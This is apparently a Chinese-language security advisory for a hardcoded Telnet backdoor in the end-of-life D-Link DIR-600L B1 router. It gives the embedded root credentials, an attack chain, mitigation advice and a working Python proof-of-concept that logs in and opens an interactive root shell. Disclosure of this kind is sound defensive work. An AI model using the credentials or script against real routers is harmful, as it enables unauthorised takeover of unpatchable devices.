CVE-2026-42374 CVSS 9.8 严重

CVE-2026-42374 D-Link DIR-600L 硬编码Telnet后门漏洞

披露日期: 2026-05-04

来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号

CVE-2026-42374

漏洞类型

硬编码凭证/后门

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-600L

漏洞概述

D-Link DIR-600L 硬件版本 B1 路由器存在严重的硬编码 Telnet 后门漏洞。由于该产品已达到生命周期终止（EOL）状态，厂商不会再发布任何安全补丁。漏洞原因在于设备固件中预置了固定的管理员账号和密码。设备开机启动时，会自动运行 /bin/telnetd.sh 脚本开启 Telnet 服务，并使用硬编码的凭证进行身份验证。攻击者在局域网内无需任何特殊权限，即可利用该后门获取系统的完全控制权，造成极高的安全风险。

技术细节

该漏洞的根本原因在于设备固件中集成了硬编码的后门凭证。系统启动脚本 /bin/telnetd.sh 会调用定制版的 telnetd 程序，并通过 -u 参数传入预设的用户名“Alphanetworks”和密码“wrgn61_dlwbr_dir600l”。该密码直接存储于 /etc/alpha_config/image_sign 配置文件中。定制的 login 程序使用 strcmp() 函数进行字符串比对来验证身份。攻击者只需在局域网内扫描并连接到目标设备的 23 端口，输入上述硬编码凭证，即可绕过正常认证机制直接获得 root 权限的 Shell。鉴于设备已 EOL，唯一的彻底解决方法是更换设备。

攻击链分析

STEP 1

侦查

攻击者在目标网络中扫描开放23端口（Telnet）的设备，识别出D-Link DIR-600L设备。

STEP 2

利用

攻击者使用Telnet客户端连接到目标设备的IP地址。

STEP 3

认证

攻击者输入硬编码的凭证（用户名: Alphanetworks, 密码: wrgn61_dlwbr_dir600L）进行登录。

STEP 4

执行

由于后门逻辑直接通过验证，攻击者获得Root Shell，可执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import telnetlib
import sys

# PoC for CVE-2026-42374: Hardcoded Telnet Backdoor
# Target: D-Link DIR-600L Hardware Revision B1

def exploit(ip):
    # Hardcoded credentials extracted from firmware
    user = "Alphanetworks"
    password = "wrgn61_dlwbr_dir600l"
    port = 23

    print(f"[+] Attempting to connect to {ip}:{port}...")
    try:
        # Establish telnet connection
        tn = telnetlib.Telnet(ip, port, timeout=10)
        
        # Wait for login prompt
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        
        # Wait for password prompt
        tn.read_until(b"Password: ")
        tn.write(password.encode('ascii') + b"\n")
        
        # Check if we got a shell
        response = tn.read_until(b"#", timeout=5)
        if b"#" in response:
            print("[+] Success! Root shell obtained.")
            print("[+] You can now execute commands as root.")
            tn.interact()
        else:
            print("[-] Failed to obtain shell. Credentials might be wrong or service patched.")
            tn.close()
            
    except Exception as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    target_ip = "192.168.0.1" # Replace with actual target IP
    exploit(target_ip)

影响范围

D-Link DIR-600L Hardware Revision B1

防御指南

临时缓解措施

该漏洞无法通过软件更新修复，因为厂商已停止维护。唯一的缓解措施是在网络边界防火墙阻断TCP 23端口，防止外部访问，并在内部网络中限制对该设备的访问权限。强烈建议尽快更换设备。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表